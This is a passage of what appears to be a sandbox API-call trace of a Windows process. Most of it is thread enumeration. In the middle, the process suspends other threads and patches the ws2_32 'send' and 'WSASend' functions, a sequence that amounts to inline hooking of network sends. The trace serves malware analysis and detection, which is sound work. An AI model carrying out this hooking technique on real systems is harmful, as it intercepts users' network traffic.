(hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.482] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.483] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.483] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.483] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.484] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.484] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.484] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.484] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.485] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.485] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.485] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.486] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.486] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.486] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.486] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.487] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.487] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.487] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.488] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.488] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.488] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.488] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.489] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.489] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.489] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.490] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.490] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.490] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.491] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.491] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.491] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.491] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.492] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.492] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.493] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.493] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.493] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.493] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.494] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.494] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.494] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.495] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.495] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.495] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.495] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.496] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.496] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.496] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.497] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.497] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.497] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.497] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.498] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.498] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.498] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.499] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.499] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.499] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.499] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.500] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.500] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.500] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.501] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.501] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.501] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.501] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.502] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.502] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.502] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.503] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.503] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.503] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.503] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.504] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.504] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.504] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.505] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.505] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.505] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.505] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.506] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.506] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.506] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.507] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.507] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.508] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.508] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.508] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.508] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.509] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.509] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.509] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.509] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.510] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.510] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.510] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.511] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.511] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.511] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.511] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.512] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.512] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.512] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.513] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.513] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.513] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.514] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.514] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.514] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.514] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.515] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.515] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.661] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.661] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.662] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.662] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.662] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.663] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.663] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.664] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.664] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.664] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.665] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.665] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.666] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.666] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.666] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.667] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.667] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.668] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.668] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.668] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.669] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.669] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.669] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.670] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.670] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.670] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.671] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.671] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.672] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.691] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x594) returned 0x8c [0166.691] SuspendThread (hThread=0x8c) returned 0x0 [0166.691] CloseHandle (hObject=0x8c) returned 1 [0166.692] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d0) returned 0x8c [0166.692] SuspendThread (hThread=0x8c) returned 0x0 [0166.692] CloseHandle (hObject=0x8c) returned 1 [0166.828] CloseHandle (hObject=0x88) returned 1 [0166.828] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0166.828] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0166.828] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0166.829] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xf0000 [0166.829] RtlMoveMemory (in: Destination=0xf0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xf0000) [0166.829] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0166.834] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0166.834] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0166.834] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0166.936] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0166.936] RtlMoveMemory (in: Destination=0x100000, Source=0x75bc4406, Length=0x5 | out: Destination=0x100000) [0166.937] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0166.941] GetCurrentProcessId () returned 0x5a4 [0166.941] GetCurrentThreadId () returned 0xa04 [0166.941] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0166.943] Thread32First (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.943] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.943] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.944] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.944] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.945] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.945] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.945] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.946] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.946] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.946] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.946] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.947] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.947] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.947] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.947] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.948] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.948] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.948] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.949] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.949] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.949] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.949] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.950] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.950] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.950] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.951] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.951] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.951] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.951] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.952] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.952] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.952] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.953] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.953] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.953] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.953] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.954] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.954] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.954] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.955] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.955] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.955] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.955] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.956] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.956] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.956] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.957] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.957] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.957] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.957] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.958] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.958] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.958] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.958] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.959] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.959] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.959] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.960] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.960] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.960] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.961] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.961] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.961] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.961] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.962] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.962] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.962] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.963] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.963] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.963] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.963] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.964] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.964] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.964] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.965] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.965] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.965] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.965] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.966] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.966] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.966] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.967] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.967] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.967] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.967] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.968] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.968] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0166.968] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.107] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.107] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.108] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.108] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.108] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.108] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.109] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.109] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.109] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.110] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.110] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.110] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.110] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.111] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.111] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.111] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.112] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.112] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.112] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.112] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.113] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.113] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.113] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.114] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.114] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.114] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.114] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.115] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.115] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.115] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.116] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.116] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.116] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.116] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.117] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.117] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.117] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.118] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.118] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.118] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.118] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.119] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.119] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.119] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.119] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.120] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.120] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.120] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.121] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.121] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.121] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.121] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.122] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.122] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.122] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.123] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.123] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.123] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.123] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.124] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.124] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.124] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.125] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.125] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.125] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.125] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.126] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.126] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.126] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.127] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.127] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.127] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.127] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.128] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.128] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.128] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.128] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.129] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.129] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.129] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.130] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.130] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.130] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.130] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.131] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.131] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.148] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.148] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.148] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.148] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.149] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.149] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.149] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.150] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.150] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.150] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.151] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.151] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.151] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.151] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.152] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.152] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.152] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.153] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.153] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.153] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 [0167.153] Thread32Next (hSnapshot=0x88, lpte=0x237fc9c) returned 1 